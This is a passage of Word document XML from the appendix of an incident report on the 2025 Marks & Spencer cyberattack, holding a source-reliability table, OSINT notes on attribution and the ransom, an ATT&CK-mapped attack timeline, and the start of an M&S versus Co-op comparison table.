      <w:tr w:rsidR="00E81640" w14:paraId="4F6058D7" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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1AC6E38D" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Tier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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5B146B9E" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="536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39716C9B" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Examples Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E81640" w14:paraId="56D69E86" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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3E3D047A" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="16A34A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Tier 1 — High</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5E18407" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Official / Regulatory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="53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7792D3DC" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CISA AA23-320A (rev. Jul 2025); UK Parliament oral evidence (Jul 2025); M&amp;S official corporate cyber-update; NCSC guidance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E81640" w14:paraId="21D7C414" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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28C6169" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D97706"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Tier 2 — Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="220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5E81ADBE" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Reputable Industry / Vendor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="536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2FF33F7F" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CrowdStrike/Mandiant reporting; Quorum Cyber CTI; Prelude Security; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Picus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> Security; Computer Weekly; Security Journal UK</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E81640" w14:paraId="4E757C3E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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D89FE0B" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Tier 3 — Lower</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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1E3D079" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>General Media / Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="536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7BC1A21F" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>BlackFog</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> blog; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Sangfor</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>; HTB blog; Al Jazeera — used for corroboration and timeline construction only, not sole attribution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0C2C2F78" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00E81640">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D33E43A" w14:textId="17A692F2" w:rsidR="00E81640" w:rsidRDefault="00000000" w:rsidP="009013F4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_Toc227971096"/>
      <w:bookmarkStart w:id="65" w:name="_Toc228127127"/>
      <w:r>
        <w:t>A.2 OSINT Collection Notes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p w14:paraId="60571DF5" w14:textId="77777777" w:rsidR="009013F4" w:rsidRDefault="009013F4" w:rsidP="009013F4">
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DragonForce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Leak: The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DragonForce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> .onion leak website was referred to in several vendor reports as the data exfiltration confirmation site. We did not attempt to access; we relied on vendor reports (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Picus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Resecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09252336" w14:textId="77777777" w:rsidR="009013F4" w:rsidRDefault="009013F4" w:rsidP="009013F4">
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>TCS Targeting: Various sources (Reuters, Computer Weekly) attribute the attack to the third-party IT provider, Tata Consulting Services. TCS did not comment. This is reported, not confirmed, attribution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C494F9" w14:textId="77777777" w:rsidR="009013F4" w:rsidRDefault="009013F4" w:rsidP="009013F4">
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Ransom Demanded: The ransom demanded is unreported. Public reports confirm M&amp;S received a ransom note; it is unclear whether they have paid as of April 2026.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E131D9B" w14:textId="409403CD" w:rsidR="009013F4" w:rsidRDefault="009013F4" w:rsidP="009013F4">
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Arrested Suspects: Various members of Scattered Spider have been arrested in the US (2024-2025) in unrelated cases. None are known to have been charged in relation to the M&amp;S/Co-op campaign at the time of this report.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC74FA0" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00E81640">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B467CB4" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="_Toc227971097"/>
      <w:bookmarkStart w:id="67" w:name="_Toc228127128"/>
      <w:r>
        <w:t>A.3 Attack Flow Diagram</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/>
      <w:bookmarkEnd w:id="67"/>
    </w:p>
    <w:p w14:paraId="2A2AB51F" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Figure A.1 below presents a simplified Unified Kill Chain representation of the M&amp;S attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437334C9" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00E81640">
      <w:pPr>
        <w:spacing w:before="60"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40"/>
        <w:gridCol w:w="1040"/>
        <w:gridCol w:w="1040"/>
        <w:gridCol w:w="1040"/>
        <w:gridCol w:w="1040"/>
        <w:gridCol w:w="1040"/>
        <w:gridCol w:w="1040"/>
        <w:gridCol w:w="1040"/>
        <w:gridCol w:w="1040"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E81640" w14:paraId="72E7C392" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1040" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DBEAFE"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="35BCEAA5" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Recon T1598</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1040" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FEE2E2"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2B829DCD" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Initial Access T1199</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1040" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FEE2E2"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4CEC7D7D" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Cred Access T1003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1040" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FEE2E2"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="27971135" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Persist T1136</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1040" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FEF9C3"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="697BEE33" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Lat. Move T1021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1040" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FEF9C3"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="526E1376" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Collection T1114</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1040" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FEF9C3"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="63ED7626" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Exfil T1567</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1040" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DCFCE7"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="27DA794E" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Inhibit T1490</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1040" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DCFCE7"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="036C7597" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Impact T1486</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E81640" w14:paraId="10EB3BF4" w14:textId="77777777">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4046AE34" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="4B5563"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Feb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7295C599" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="4B5563"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Feb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76CA6E13" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="4B5563"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Feb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4EEDB388" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="4B5563"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Feb–Apr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100D4027" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="4B5563"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Feb–Apr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6762C02D" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="4B5563"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Apr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52737E66" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="4B5563"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Apr 2025</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33C4F927" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="4B5563"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>24 Apr</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1040" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="80" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="26972ECD" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="4B5563"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>24 Apr</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2B67AC13" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00E81640">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="434123BA" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4B5563"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure A.1: Simplified attack phase timeline mapped to ATT&amp;CK tactics. Blue = Initial; Red = Compromise phase; Yellow = Exfiltration; Green = Impact.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350473B5" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00E81640">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06D7B821" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="_Toc227971098"/>
      <w:bookmarkStart w:id="69" w:name="_Toc228127129"/>
      <w:r>
        <w:t>A.4 M&amp;S vs Co-op Comparative Outcome Table</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>
      <w:bookmarkEnd w:id="69"/>
    </w:p>
    <w:p w14:paraId="1CBF8782" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00E81640">
      <w:pPr>
        <w:spacing w:before="60"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3430"/>
        <w:gridCol w:w="3430"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E81640" w14:paraId="2EB8393E" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="250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7ABE3E92" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Factor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="343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6F7357A7" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Marks &amp; Spencer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3430" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1B3A6B"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="36F6A22C" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Co-operative Group</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E81640" w14:paraId="2B5E5765"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6C78CF65" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
